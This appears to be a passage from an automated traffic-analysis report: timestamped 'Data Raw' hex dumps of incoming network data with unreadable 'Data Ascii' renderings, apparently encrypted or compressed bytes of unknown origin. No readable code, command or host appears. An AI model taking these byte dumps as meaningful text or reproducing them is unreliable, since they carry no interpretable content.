                                2021-10-13 14:54:49 UTC186INData Raw: 30 56 f9 ad 10 63 b4 58 2f e5 83 0b 50 39 fa be 64 d3 62 2a 06 73 3e 84 c8 6c fb 46 3e bb 93 8a 7c 0b 77 9d f8 85 88 df 22 96 8d 4c bd 60 5a 4f c8 2f 00 93 64 73 be aa b6 dc 48 dd 7a 41 3a 29 ed 3b a1 1c c0 79 7f 1f a6 8b 0c 87 c6 0b 48 20 94 ea d8 08 87 ef b4 45 2f c1 ab cc 6e 14 30 b0 5c bf 67 fe 73 7b ac 9b a1 e1 2a 97 e0 1b ef ff f5 b3 ca 18 4a 6d 98 9c f4 18 82 00 08 ee 01 f2 80 4f c0 34 d0 a9 9f 5f 15 5b 50 8b d4 c0 c6 92 41 17 d2 6f c7 e1 03 c9 28 dc d8 e9 2b 2a 8a d9 43 f8 25 5e cd 49 ec 79 a5 08 f5 3c c1 7e 59 8d d1 f3 c2 01 d2 eb ce ee 4d 80 18 56 f9 2b 77 8a 1e 64 8d 70 f9 3e 35 c2 06 7e 93 1a 65 15 c5 3c 44 81 21 1c 59 55 59 a6 12 ea 81 dd 86 e9 d5 13 92 44 d1 ab c9 27 2b bd b5 2d fe 2a 2a 60 ff 47 5e c4 ad b3 8d 85 a7 42 7c 5c 8e 0e 81 be f1
                                Data Ascii: 0VcX/P9db*s>lF>|w"L`ZO/dsHzA:);yH E/n0\gs{*JmO4_[PAo(+*C%^Iy<~YMV+wdp>5~e<D!YUYD'+-**`G^B|\
                                2021-10-13 14:54:49 UTC187INData Raw: 33 99 b3 23 63 4b bb dc c2 31 bc f5 6e 04 5b 2c 9c 19 12 25 84 c6 f9 bb 36 a0 7a 42 a9 21 7e 66 97 84 2e eb a3 ed 3b e5 bd 96 0b a3 f6 05 cc f1 07 34 c5 36 fa bd 1f f8 54 86 4d f8 40 3e 53 3e 97 15 cf 6f 5b 57 1a 23 08 48 00 5d 44 b5 b5 36 43 85 1d 04 52 8c ce c9 16 4e 82 a0 b0 c8 bd b7 79 52 13 8e 77 fc 26 09 a1 95 e7 f0 58 76 cb 01 0a 83 f1 c7 f6 cb 55 5e 5d 91 c3 bf 62 83 19 ed 38 2a 04 53 7a 9c 32 4d b2 6f a6 c3 27 4a 96 ba 24 fc 57 7d bc 6c 8e 1e 9b d3 27 19 18 0a a8 93 6a ad 22 16 89 92 71 7c e8 bb b8 ab 1d 31 fb 15 ae 31 f3 c1 a0 25 ae 56 e5 2a 68 b8 aa 9e 7a 24 50 57 db 85 86 4c ce 55 37 3f 4a ca a0 26 31 d0 a7 94 62 ed 2e c0 03 9b 31 cc d1 8a 39 39 88 24 ab 89 9d 15 ce e1 e7 d5 0c 1b 75 87 5f 65 98 f5 0d b2 19 9a b8 87 53 4a 4d c0 be 0e 3f b1 40
                                Data Ascii: 3#cK1n[,%6zB!~f.;46TM@>S>o[W#H]D6CRNyRw&XvU^]b8*Sz2Mo'J$W}l'j"q|11%V*hz$PWLU7?J&1b.199$u_eSJM?@
                                2021-10-13 14:54:49 UTC189INData Raw: 57 bb 3d 03 aa d9 ec 26 2a eb c4 68 d1 dd 6c 23 9a d2 8b cd e7 e8 62 f2 7f bf 51 64 9f 20 a3 20 59 01 2f b7 bf f2 5d 4d 4b 2b 95 85 5e 31 a6 db 68 32 a8 75 19 ac 08 9d 40 33 ab bb 9c aa 45 b1 2f 6b d1 19 f3 2d 45 43 c7 4d 6a 14 1c c9 59 04 03 f4 af 8d 99 28 c1 ac 4b 14 84 f7 eb e3 c0 2b c4 2a 6c 86 0b 7b 54 8f e2 5e a1 45 b2 44 65 fc d2 d1 4e 9d c3 96 a5 5d c4 b2 18 33 f1 6f 9e 77 d5 cb 06 d1 53 55 cd 6d 89 d2 f3 54 4b 60 a0 ae ee 3e 76 8a 9d f5 85 44 ab ee b4 15 83 ad 24 4c 09 0b 43 3b 0d 1d c6 d0 1e 32 7a 00 b6 68 53 13 47 3f 13 b1 bb 76 95 e9 15 b7 e7 e1 f6 b3 8e 8e 29 cf 40 0c d7 6b 8b 57 38 e1 85 55 7c cf e3 4f 7e f1 f9 e8 9e 13 cc 9d ae 42 9b b1 0e 75 13 02 29 6e a1 30 26 f1 b7 77 9e a1 0c b8 4d ac c2 90 e3 0f 36 cb 01 ec d0 8c 85 3a 4a bb 7f 04 dd
                                Data Ascii: W=&*hl#bQd Y/]MK+^1h2u@3E/k-ECMjY(K+*l{T^EDeN]3owSUmTK`>vD$LC;2zhSG?v)@kW8U|O~Bu)n0&wM6:J
                                2021-10-13 14:54:49 UTC190INData Raw: da 69 af 31 99 66 a2 cb 7e b5 fe 10 ed 66 15 c1 62 4d be 95 ce 63 bd a6 7d c6 9a c9 30 e6 63 a6 b9 92 d6 83 20 92 83 69 df 72 df df 88 84 10 d6 52 5e 6e 21 76 8d 99 cc 77 df f0 34 c9 5d fc 7b 1d aa 1a 08 25 30 46 6c 79 65 3e c7 d1 7a 92 83 2a e1 7b 55 f5 50 1e 16 b0 60 5f f4 c2 4a 96 21 02 f4 b2 bd e4 bf f9 ab 7a ad 0c 73 c1 d2 89 f1 d4 c1 da 47 91 db be 7b 61 aa 9f ed 44 9f 25 cc cf 30 ae 9d 6a d3 35 e9 f5 82 7a d5 5a 81 d2 13 d7 c8 b2 90 4e 06 78 5a e9 42 95 35 f9 cb e8 92 72 a2 f1 eb d8 9c 06 95 61 7d 7b 1c 50 5a 08 74 5e e0 d5 54 fb 7c 21 6b b4 51 dd bd a0 51 0a e4 0e 82 aa df 3c d7 79 04 1e f4 9a 8a 50 97 39 2c 49 ca 13 6a 81 c0 45 44 71 99 a7 d3 e9 da c7 1e e8 94 16 9c 60 20 ad 08 24 cb 91 bf 0a 3f 29 fc 4f dc 64 9f c7 6b 9e 78 a6 66 41 41 57 c9 28
                                Data Ascii: i1f~fbMc}0c irR^n!vw4]{%0Flye>z*{UP`_J!zsG{aD%0j5zZNxZB5ra}{PZt^T|!kQQ<yP9,IjEDq` $?)OdkxfAAW(
                                2021-10-13 14:54:49 UTC191INData Raw: 12 d8 ab ab 59 ed 53 78 2d 27 b4 fc 0f aa 86 f6 d4 65 03 86 99 d6 dd 6e 5f c5 37 f6 e0 44 30 b2 13 b3 be a9 63 0f 77 6b 45 40 b0 8b 86 d8 7b 8f c9 f3 52 d7 1c f8 00 d8 66 c4 18 6a 88 4a 23 9f d6 6d 33 84 bd 2b 87 65 97 33 8d e4 60 01 1d 7a 5d 5b c6 b6 5e 00 bb a6 9c 9d 89 32 8b b7 c3 8d af a0 7c 48 f9 56 5d 57 25 1b d2 5e 81 fc 30 64 1d 31 cd 2f 05 b5 cc c9 c7 78 78 15 92 85 f4 42 12 4a ee 07 5e 05 93 2e 8f 74 bc 96 9e fb a0 d9 da 8b b8 7e ff af f4 a2 1f eb 1d de ca 35 ba 73 19 54 b8 7b aa 48 05 cc 6d 48 65 9e 10 f8 1e 05 d1 8c be 0b 6f eb d2 d8 46 fd 89 ce 7c 12 fe fd eb 68 41 d6 19 87 2a a0 62 4b 13 56 43 58 be 2a 35 0c 73 8c ee f4 fe 68 39 27 1a a3 df 2f 8a 1d fc 35 37 ef 9a b9 d0 77 f2 19 77 28 de b0 94 a5 27 ba 7f cf a1 22 24 9c 98 9a 29 73 20 ac 9f
                                Data Ascii: YSx-'en_7D0cwkE@{RfjJ#m3+e3`z][^2|HV]W%^0d1/xxBJ^.t~5sT{HmHeoF|hA*bKVCX*5sh9'/57ww('"$)s
                                2021-10-13 14:54:49 UTC192INData Raw: b7 b7 a6 c5 59 b2 1d 04 ce 1f 96 41 39 49 7e 02 47 93 f1 bb d3 b6 d3 91 eb 06 c3 eb a1 d5 67 64 21 84 d3 6c ff ff b7 59 7a ad 62 50 28 1f 33 e1 de 7d e0 9f 9c 9c 48 4d 96 95 ca 86 1e a9 86 de 87 48 9a 10 9f b1 1f 67 f7 b3 b7 c5 b9 54 30 44 e6 cb 80 93 dd 04 4a 56 f9 38 cf 53 e2 ab 4d 9e 2e 45 cd 13 1e b4 1b 37 b2 11 fa b9 d7 d3 bc 2f cb d1 ca 6c 28 b4 9a f4 40 98 7d 9e a3 66 39 84 27 e6 60 30 c1 26 d2 14 e6 ad 97 fd f9 6d e1 8f 9c 70 38 ec b4 4e 96 a8 72 03 a9 2a ee 1a aa 60 3e 17 c0 3c b3 22 38 4b 24 63 fd d3 92 a9 c7 95 5c 15 9b 18 ca 97 cd 25 65 1a 34 fd cb fe 39 f1 da f5 e1 b7 27 c6 81 6e 1c 45 de cc 81 83 33 55 b2 74 d4 f7 67 4e e4 4d 45 ec a4 e0 ac d9 1a 6c 4c 6f 5c 80 41 55 31 00 25 83 1f cf e9 6d 8b de 42 7c 90 27 5d c1 30 0c 67 fc f9 e1 12 e1 f8
                                Data Ascii: YA9I~Ggd!lYzbP(3}HMHgT0DJV8SM.E7/l(@}f9'`0&mp8Nr*`><"8K$c\%e49'nE3UtgNMElLo\AU1%mB|']0g
                                2021-10-13 14:54:49 UTC194INData Raw: a3 42 b9 a8 1a a8 30 f6 d8 f4 10 60 b4 90 1e bc 83 08 50 16 db e5 64 d0 62 cc 37 28 3e 87 c8 40 e9 1b 3e bb 93 a9 6e 56 77 9e f8 a7 9a 80 22 96 8d 6d af 3f 5a 4c c8 0f 12 f2 64 73 be 8d a4 bd 48 de 7a 67 28 4a ed 3b a1 39 d2 1a 7f 1c a6 af 1e e2 c6 0b 48 fb 86 8f d8 0b 87 25 a6 22 2f c2 ab 08 7c 7d 30 b0 5c 45 46 97 73 7b ac a8 90 8a 2a 97 e0 77 ce 94 f5 b3 ca 1c 7b 00 98 9c f4 e5 90 6d 08 ed 01 46 92 20 c0 34 d0 02 8d 30 15 58 50 21 c6 b1 c6 92 41 be c0 1e c7 e2 03 6a 3a af d8 e9 2b 88 98 aa 43 fb
                                Data Ascii: B0`Pdb7(>@>nVw"m?ZLdsHzg(J;9H%"/|}0\EFs{*w{mF 40XP!Aj:+C
                                2021-10-13 14:54:49 UTC194INData Raw: 25 ff df 3c ec 79 a5 a8 e7 49 c1 7d 59 2a c3 84 c2 01 d2 4d dc 99 4d 83 18 f3 eb 52 77 8a 1e c0 9f 09 f9 3d 35 ba 17 05 93 1a 65 6a d4 47 44 82 21 62 48 29 59 a6 12 cc 83 a1 86 e9 d5 34 90 3a d1 ae c9 0f 29 c0 b5 2a fe 03 28 e0 ff 47 5e ee af 33 8d 9d a7 1a 7e 15 8a 11 81 30 f3 44 bd c3 a8 68 54 9c 17 90 c0 a9 9b 93 32 fb 71 96 4b c6 fa a5 c3 ca c0 79 ff 56 d3 0e b2 48 74 a6 31 de c1 fd ee 6c a6 fa 6f f9 73 1b 3a a6 38 2b cc ca eb 35 97 fc 42 56 9c 5d d9 71 14 c8 92 e8 93 27 8f 59 8a 81 0b 2d e3 ba a3 99 a9 26 20 54 f7 03 91 6d cc c1 5b 2b e8 1f de 6e fd b6 50 83 32 db ca e3 19 32 1e 4a b9 c8 f6 48 db 18 b0 75 c7 b7 c6 0f 24 bf 96 ff 4c c4 7f b9 a1 80 3e e1 1e a0 59 b0 f8 3d eb 55 d8 4d a8 2c cb 43 d3 92 ae b9 0b 45 86 6d a6 ee 45 85 b3 aa f5 0d 91 81 25
                                Data Ascii: %<yI}Y*MMRw=5ejGD!bH)Y4:)*(G^3~0DhT2qKyVHt1los:8+5BV]q'Y-& Tm[+nP22JHu$L>Y=UM,CEmE%
                                2021-10-13 14:54:49 UTC195INData Raw: 17 35 8a 1a 33 00 9c 21 8b 1c 5f b4 99 d8 fa 29 8d a6 93 76 af c3 a9 29 27 92 de c6 52 41 04 7e ba 50 e1 0c bb 22 05 5d 04 d1 ef 59 44 42 b6 ee 2f 99 54 6f 4e 76 42 b8 80 e2 7c 8e ed 07 aa de d8 b3 bf 99 89 10 41 ac 09 f6 6c 2d eb 1f 38 a3 4c 54 c1 d1 3c 5f 7a 0b a4 cd 5c c1 25 31 cd 51 8e cb 1a fe 5f d7 b7 d9 26 55 b4 b4 5b d0 83 58 35 02 be eb 2d bf 16 8b 00 73 6a ea 9d 7e 86 32 0f 8c 93 83 0a 6a 13 d5 96 aa aa e9 22 c3 e2 5e c0 14 6b 78 c8 3c 5e d2 27 21 f6 b0 97 e9 7e dc 1d 7f 5d 76 b8 6e e7 7f d3 45 32 71 c2 a5 73 e2 f8 0a 0a 3a 87 a9 99 09 c3 f5 a7 00 6e c0 ed d6 7d 53 71 b1 14 a4 47 9f 32 79 ce 4a 91 82 6b 96 84 92 cf b8 90 c5 87 d6 1e 18 f4 f8 b2 2a fd 65 46 8e 6c cc d2 4f a6 74 d0 95 cd 5f 7d 1b 50 97 a2 b4 90 fc 2d 39 ac 0a 8e 8e 65 fd 49 b1 b9
                                Data Ascii: 53!_)v)'RA~P"]YDB/ToNvB|Al-8LT<_z\%1Q_&U[X5-sj~2j"^kx<^'!~]vnE2qs:n}SqG2yJk*eFlOt_}P-9eI
                                2021-10-13 14:54:49 UTC196INData Raw: 43 62 6b 38 85 b7 1f c6 21 db d3 24 26 d9 3d 81 10 a3 dc 0c ef 60 43 d6 84 71 d0 a6 c8 ff 4f 6f 64 fb 86 02 eb 96 11 f9 c3 2c 1e fb f9 89 39 78 bf ac 8d 1e 9a 84 ea db bd 7c 49 6c 55 2b 07 29 f5 11 46 53 bb 5c c8 c8 6c fd 7f 07 85 b1 87 2b 18 77 46 45 b7 8c b1 73 21 a8 2a 0a b5 0d 06 24 61 79 ba ce 76 20 e6 42 32 75 be f6 98 0d e6 de 6b 90 01 01 ce c1 17 9b dc 7d 9f 6f 33 80 20 32 c2 4b 7a dc cd 61 69 2f a6 21 63 ba ef de 09 1d ac c3 a3 0b 02 5e 9d 02 8e 3f 1d 5c 0f 8a 1e 7a 42 90 08 31 de e4 ca e7 00 95 5f d4 0d 02 58 1d 10 04 b6 a2 18 77 64 e2 57 fa 96 8b 78 d1 87 82 eb ad ec 26 7c be 49 5d 19 7f 23 97 fb 88 bc 6a 58 7e 90 c7 45 5f f1 ad af c5 14 22 5d f5 9a f4 2c 48 1a 8b 61 5c 6a f6 0e d2 47 dd f2 eb c6 fd 79 d3 f0 dd 56 a2 22 9f c6 6a ee 40 c7 c8 7f
                                Data Ascii: Cbk8!$&=`CqOod,9x|IlU+)FS\l+wFEs!*$ayv B2uk}o3 2Kzai/!c^?\zB1_XwdWx&|I]#jX~E_"],Ha\jGyV"j@
                                2021-10-13 14:54:49 UTC198INData Raw: bc 37 a6 67 6c b9 0c 82 1c cc 32 88 69 af 16 3a b9 a6 96 c2 49 a1 e4 b8 96 39 d4 76 64 89 44 13 ee 1e 69 ff 05 95 4b 73 eb 70 1b 93 7c 00 3a 89 49 37 e5 72 22 3a 35 2b c6 66 8f c7 b3 ea 8f b0 61 c6 37 b4 ca c9 54 4e cb ea 5d 8d 4f 79 04 8f 27 2c a5 d9 d7 cb e8 cb 26 19 2c da 78 e4 db f1 69 dc f2 ee 24 38 44 5a cc a1 8e fd 24 65 af 1f b0 05 1a 8d e7 a2 e9 a6 c2 b6 03 ba 16 fc 11 04 ec 50 c1 a7 52 af 45 c2 e8 0a 38 14 27 3a d3 53 3c a8 cd 9c 19 e7 dc 37 5b e4 6e b1 3f 0d e7 fc fd da 31 f9 49 e1 b7 0a 85 87 2c cb aa e6 24 50 71 9b 3c 96 4b ae da 19 f5 99 a7 ab 2b 9b ea 3f a8 4d 9e bb b6 60 2a 6e 68 cf 56 ab a5 a1 db c9 d4 a1 04 b0 bf 55 4d cb b3 30 d8 14 ab c9 6d 42 9d 5b 9b 30 a3 bd 74 a1 33 90 b4 f7 e7 81 9e 9e 47 d2 cd 66 81 da 3f e1 e8 69 e2 d7 fb aa ec
                                Data Ascii: 7gl2i:I9vdDiKsp|:I7r":5+fa7TN]Oy',&,xi$8DZ$ePRE8':S<7[n?1I,$Pq<K+?M`*nhVUM0mB[0t3Gf?i
                                2021-10-13 14:54:49 UTC199INData Raw: dd 16 f9 4c 66 f8 0a 40 26 81 7f c9 7d 7f b4 f8 ec db 12 b7 bd f3 30 dd e2 a5 08 1b 8e cf f5 07 24 22 44 92 5a de 03 bd 78 56 33 24 fd d3 5b 44 04 f6 8b 64 9b 48 4d 70 59 42 af a2 e6 7b 88 ce 40 c6 ee c4 a2 ae f0 a5 1f 50 aa 05 e4 3b 2d f3 0f 7b cf 71 58 f5 ec 3b 44 22 7d c5 ec 5c a0 0f 19 ce 40 f7 9d 70 cf 53 ea 9a c2 7c 0d d1 9a 6b 8c ec 64 12 02 a9 db 64 99 16 ce 46 24 5b e7 9a 52 9b 36 51 d4 e0 b4 6f 4c 12 e8 aa bb e8 af 4d f9 fe 72 ae 23 36 21 bb 11 13 d7 0d 01 ce 9e d6 b9 48 88 08 63 79 48 9f 49 c4 47 81 1c 09 7b d4 a3 7a 87 85 78 2d 1a f3 8f d8 44 f2 d8 d3 2c 4c a1 d8 e3 39 71 5c d4 3b 84 33 9b 73 3e c9 7f da 84 53 f4 8f b2 bd 9b a6 c5 ab cd 1f 6d dd f9 9d 37 fe 72 4a 9d 6e de e0 2e a2 59 b5 a1 f8 3e 61 3f 50 94 a2 ac a3 e7 24 4c a6 0a b3 bf 40 f3
                                Data Ascii: Lf@&}0$"DZxV3$[DdHMpYB{@P;-{qX;D"}\@pS|kddF$[R6QoLMr#6!HcyHIG{zx-D,L9q\;3s>Sm7rJn.Y>a?P$L@
                                2021-10-13 14:54:49 UTC200INData Raw: b3 6d c6 2d 43 3d 6b bb 92 6b eb 1a f5 f0 33 33 f1 1d b9 77 fe f0 15 d1 4e 7c b8 82 27 96 b6 f1 92 6e 58 17 fa e6 36 dd b4 63 f6 fb 4b 79 f9 96 89 0f 0b 99 cd b9 09 b9 f6 c6 e2 da 3a 5b 1f 71 1d 77 04 e6 70 53 65 e8 4a ed a1 61 cd 7f 36 bc d4 91 1f 79 61 74 01 b1 af d0 63 3d a8 14 64 9f 62 34 2e 50 7e ba c4 52 3c e2 36 02 44 d0 d2 c0 4a c7 f2 3b a7 30 77 e9 ed 72 8c f6 12 b1 5e 5f 84 2b 46 d2 7a 14 d8 95 22 62 1a d6 25 49 df da f2 7b 13 9a a4 e1 06 6d 4e b0 70 a3 08 7a 19 11 ef 2c 70 36 a5 38 5f f1 bd 99 f3 3b e6 49 ff 64 0f 66 1d 27 24 c5 b3 24 1a 2c ff 25 fc b8 e2 54 ec 87 95 de f8 e4 13 12 9c 13 09 30 69 4c be c6 88 93 55 2c 40 af a9 46 67 9d ab b9 aa 17 78 2e f5 b4 ab 2f 7c 7b 8e 57 39 41 fc 1d 8d 56 d9 ea c1 ee d1 41 d3 c1 d0 22 be 3c fe ee 77 8b 5a
                                Data Ascii: m-C=kk33wN|'nX6cKy:[qwpSeJa6yatc=db4.P~R<6DJ;0wr^_+Fz"b%I{mNpz,p68_;Idf'$$,%T0iLU,@Fgx./|{W9AVA"<wZ
                                2021-10-13 14:54:49 UTC201INData Raw: 58 14 ca ad 31 9c 44 68 de 0d 89 1e c9 32 92 59 92 0b 2b b3 a3 9e c2 67 b7 c4 82 ab 23 e5 57 6b b9 5f 05 ee 7f 52 9e 33 8b 46 45 ed 7a 2d e7 69 00 2f bb 3c 03 e5 55 15 2f 25 2c c2 61 9e d2 a8 f4 8e b4 7e 92 08 b4 c2 a6 55 52 ec c1 5a 9b 4b 47 61 98 23 2a 9b e1 e2 ec f5 c6 2f 7c 39 eb 7e de e9 a1 6e cb 93 c5 56 30 4c 67 fe 90 88 ea 45 5b ca 13 b9 48 1c 93 94 a7 e3 c3 a5 9e 16 8c 33 c5 11 1a 9f 42 c3 b6 0d a7 55 c3 d7 6b 00 12 37 56 e4 66 3c b8 e1 86 08 e3 bd 3c 7d f1 52 9f 33 61 c7 c1 e0 e0 2b ea 4b 8a 9d 7a a2 90 2a d6 ad c1 2d 75 67 83 2d f3 61 cb c8 31 9b 88 a3 d9 17 8c ea 37 a3 4d ba b3 a7 48 27 6b 6b d8 3f 96 88 a2 ae ec d0 a0 0d 93 bf 57 22 f0 9e 2d c3 09 c4 f6 58 52 98 53 9b 2b 91 b6 62 a7 3f fc 94 ce f4 9a 82 8f 28 d2 d0 43 80 dc 3b e2 ff 04 85 f7
                                Data Ascii: X1Dh2Y+g#Wk_R3FEz-i/<U/%,a~URZKGa#*/|9~nV0LgE[H3BUk7Vf<<}R3a+Kz*-ug-a17MH'kk?W"-XRS+b?(C;
                                2021-10-13 14:54:49 UTC203INData Raw: 78 7e db c5 1a c5 4a 07 ed 0a 34 3a aa 77 ca 7f 7f b8 88 c8 c6 0f 8d d2 d3 21 db c8 82 19 1d 9f d8 9c 10 35 3f 74 b5 34 cf 07 bb 4e 64 29 31 ca d3 44 74 14 f7 8d 16 95 5d 4d 46 75 59 dd 83 fa 66 88 e8 58 84 c8 c4 be bf 99 8b 1b 0e 9d 1f f8 2d 59 c0 1e 62 cd 7d 5f d1 e0 37 48 39 4b cd f0 57 a0 04 16 d5 4c ca 90 74 aa 63 ea ab c4 7e 06 f7 96 72 95 e2 78 39 10 b5 d0 64 83 17 d4 36 14 5b f1 97 74 9c 34 52 f1 f6 a8 2b 64 00 f2 f8 b9 fe ab 7d c4 e5 7e c8 14 11 2b b1 30 7c e4 0a 72 d9 94 d1 83 09 b0 0e 51 4c 50 a9 55 d6 29 d3 2a 10 7d cd b5 6b d4 ae 7f 3c 1f e8 9d b6 09 c5 db a7 06 40 c0 ef f8 7d 51 5f b1 1a 8a 47 b9 1c 79 e4 64 91 a2 45 fb 90 b2 bd 9a a1 de ca fa 15 1d e1 c9 9b 43 f0 6f 08 8d 6e a9 f0 20 c0 51 bf f2 e9 30 15 3d 35 a4 98 89 a8 f5 2e 4c 88 02 a6
                                Data Ascii: x~J4:w!5?t4Nd)1Dt]MFuYfX-Yb}_7H9KWLtc~rx9d6[t4R+d}~+0|rQLPU)*}k<@}Q_GydECon Q0=5.L
                                2021-10-13 14:54:49 UTC204INData Raw: f1 53 6f ae 4a c0 2e 54 48 4c a7 93 1f e9 12 af eb 05 3c f5 26 b2 63 bf d5 0e d5 5b 15 a5 80 53 8f 80 f0 8c 7e 5c 17 f0 bc 74 eb b2 11 cc f0 58 3a c1 90 bb 0c 17 9d 89 e9 0c a4 e1 d8 e9 cf 3a 4a 03 5e 13 70 04 d0 11 41 76 bb 59 ed c8 4c c2 0d 63 96 d8 90 7c 5e 7d 7e 2a a2 db f2 42 2c bb 09 6f a8 10 1f 2b 42 73 a2 ee 41 2a de 30 70 6e d2 d0 a1 7f f2 f4 04 bf 3c 62 fc dc 65 ae eb 0f d7 64 56 95 28 40 cf 79 1f dc e1 24 7f 05 c9 36 3b e9 e6 e5 62 1f 80 86 93 20 6d 6f c4 65 af 12 42 57 23 e7 3a 46 30 93 34 52 ff d0 ab ea 0a f0 4d ec 7f 00 75 72 06 5d ff 82 2f 02 6f de 25 fc bb e4 48 8b ca a0 df cc cf 19 11 9e 7d 29 10 47 49 b5 c2 fc b1 5e 2d 72 af b5 46 71 9e bc f5 82 15 0c 18 fe b5 99 2f 60 7b 98 54 2e 0d d2 19 f9 58 ca ff ea cc d0 26 fd e0 cc 4d 8f 54 d0 c9
                                Data Ascii: SoJ.THL<&c[S~\tX::J^pAvYLc|^}~*B,o+BsA*0pn<bedV(@y$6;b moeBW#:F04RMur]/o%H})GI^-rFq/`{T.X&MT
                                2021-10-13 14:54:49 UTC205INData Raw: b9 91 86 6c 1d f6 bb 22 95 6a 75 bb 3b 8d 0c cc 3c 88 4f c1 2c 20 a5 b6 96 af 2e 91 df b1 82 28 e2 6c 64 85 45 04 8b 6d 5a ea 2f b4 5e 4d f0 78 0b fe 5a 10 3a b9 51 25 f4 48 24 18 31 3d ce 60 8f e2 a8 ef 84 bb 60 92 16 a5 dd a0 49 4c ec c5 44 97 5e 65 11 8b 2f 31 aa de b2 df e2 c0 27 04 11 fe 7e e8 d1 9f 7c b9 95 cd 22 08 6e 61 ce b5 99 eb 24 51 af 05 8b 0b 17 9f e6 b0 8e 84 a7 8f 21 bb 1b c3 07 77 d8 54 d2 8b 3f 8f 46 c3 ff 05 35 1c 26 5f e2 52 59 9f d1 81 19 eb d0 75 4c ec 60 bc 28 7e a2 c0 ec fd 2b e6 4b ef 9a 6f ab 92 2e d0 b7 af 2d 43 6a af 38 f2 7a aa c0 3f fe 8b 9e b8 36 94 ea 3f b2 5c ba a9 c4 7a 2e 78 5b cb 32 94 81 a1 cd c1 d5 83 04 a0 b2 5d 28 f6 92 2b d8 64 81 d4 6f 4f 95 5b e9 29 91 aa 67 a5 37 88 b8 ff f5 e3 bd 8b 22 f4 c3 56 81 dd 2e 8d c0
                                Data Ascii: l"ju;<O, .(ldEmZ/^MxZ:Q%H$1=``ILD^e/1'~|"na$Q!wT?F5&_RYuL`(~+Ko.-Cj8z?6?\z.x[2](+doO[)g7"V.
                                2021-10-13 14:54:49 UTC207INData Raw: a4 78 d6 7e 76 ce df 07 aa 65 73 fe 0e 23 0d 83 77 d7 68 0d 94 96 ca c6 12 8c bc cd 21 c1 e3 c6 24 03 90 ee 9a 03 34 3b 7e b5 40 a8 05 aa 65 68 0d 31 cc c3 59 44 71 c3 8b 10 ac 4c 4b 4a 74 43 dd b7 e6 61 a3 ce 40 d8 e8 d4 be bf f0 af 2e 65 b0 14 c6 31 44 dc 0b 0b c4 7d 4f cb d4 3d 48 2d 53 e1 f1 5d f0 2e 11 cd 51 b8 98 7f de 6f dd b6 d8 7e 15 b4 9e 7a 91 dc 5e 39 00 b1 fd 0b a4 0c ce 36 34 5b f1 8b 5f 89 34 7d d5 e6 bf 1b 0b 32 f2 9c 9f f8 bc 47 e7 f9 17 ec 05 3d 27 a6 35 70 f0 01 02 ca f1 e7 9f 3a a5 0a 6e 6d 4c 8e 48 d8 37 a7 79 3d 5d d4 a9 6f f3 83 64 2b 09 fe 9a ac 09 d3 dc d5 20 4e a4 f8 e3 1c 66 44 b1 1f 8a 29 88 16 0b d8 0b f6 84 5e c9 b0 bc bd 8b f5 c2 af cd 25 3d f7 ef 80 43 f6 65 7c b0 48 c7 e7 2a b2 5b b1 9e df 3a 67 2c 35 a2 97 af b4 e7 41 3f
                                Data Ascii: x~ves#wh!$4;~@eh1YDqLKJtCa@.e1D}O=H-S].Qo~z^964[_4}2G='5p:nmLH7y=]od+ NfD)^%=Ce|H*[:g,5A?
                                2021-10-13 14:54:49 UTC208INData Raw: b0 dc d4 e0 50 7e b5 67 c8 02 57 4e 5d af 83 73 f7 77 bc d1 35 0d c7 10 b3 62 b5 ca 0b f6 48 78 bf 89 5e d0 89 eb 93 58 50 14 f3 a9 02 cf ae 68 9f d7 40 16 ce 92 88 01 08 85 fb de 23 be f0 ca e1 93 68 6b 02 66 15 6a 04 8c 42 42 76 d2 5f f3 a1 75 cb 0b 0a bd df cc 3a 77 63 7c 24 a4 af d4 42 3a f4 3f 63 96 03 02 38 27 77 b3 df 6c 0c de 36 11 41 ee dd b9 7e cb e5 0a b9 14 64 e5 f6 65 a5 84 3e a5 52 52 95 1d 76 c9 61 1f dc e1 0e 7f 0e a6 23 5e ce d6 d4 6c 1d 9d b0 95 20 7b 1d a3 67 be 39 5e 78 26 eb 3b 4a 36 ae 51 60 e3 dc a6 ef 2d ec 3d e2 7d 3e 44 6c 01 3c da ae 35 0e 02 d4 27 c2 86 e5 5f fa f2 a0 dd c4 dc 05 7c 9c 76 29 00 55 51 b9 ce fa 9d 44 21 1f b9 a2 53 5a 81 bc 9c aa 02 11 29 e9 c0 a7 33 61 6e 89 56 72 5e f6 19 f8 43 d5 ea e7 a3 eb 55 9d f6 d4 4e b2
                                Data Ascii: P~gWN]sw5bHx^XPh@#hkfjBBv_u:wc|$B:?c8'wl6A~de>RRva#^l {g9^x&;J6Q`-=}>Dl<5'_|v)UQD!SZ)3anVr^CUN
                                2021-10-13 14:54:49 UTC209INData Raw: 03 93 3a ce b1 ec 2b 70 98 d7 45 f9 26 04 d0 47 ee 7f a5 51 e7 32 d0 ff fc d5 c4 e1 af 06 f2 b2 cf 83 43 83 1d 2d e8 2a 79 97 1a 3f 9f 78 f7 39 32 9a 09 73 82 3f 61 4e d7 32 4d 85 21 47 58 d4 98 a2 32 ea 93 5c 43 ef d5 12 9f 4b d2 af c9 3b 3b b8 b3 26 ec aa e7 73 7f 97 4c 44 78 a0 0d 5e a9 44 7c 5f 9c 8a 5c b0 f4 0f b9 e0 28 b3 51 09 12 a0 d2 69 7d 20 16 cb 70 dc 4d 5f fe 86 43 5f c6 e2 fb 70 53 af b7 54 76 9e 23 26 17 41 e9 29 b4 3a a6 44 f3 93 28 10 f4 44 c9 ba 72 9c 86 a1 53 1b a5 0d d3 50 2d a1 93 97 82 df 7a 37 0a 2b 0e c7 e3 43 be c3 8f 49 2e 03 f5 51 9e 0b eb ad 5d 86 ea c6 d1 41 f5 85 5b c8 37 cd dd c6 1b 16 04 01 aa 57 f0 85 c1 bd a3 b8 dd 77 53 d2 3e 5f 03 f2 57 a5 6a d6 3b 05 32 70 2f 9e 59 f0 ca 87 c5 57 dc dd 9f 07 f2 f7 db 47 94 23 37 ea 8f
                                Data Ascii: :+pE&GQ2C-*y?x92s?aN2M!GX2\CK;;&sLDx^D|_\(Qi} pM_C_pSTv#&A):D(DrSP-z7+CI.Q]A[7WwS>_Wj;2p/YWG#7
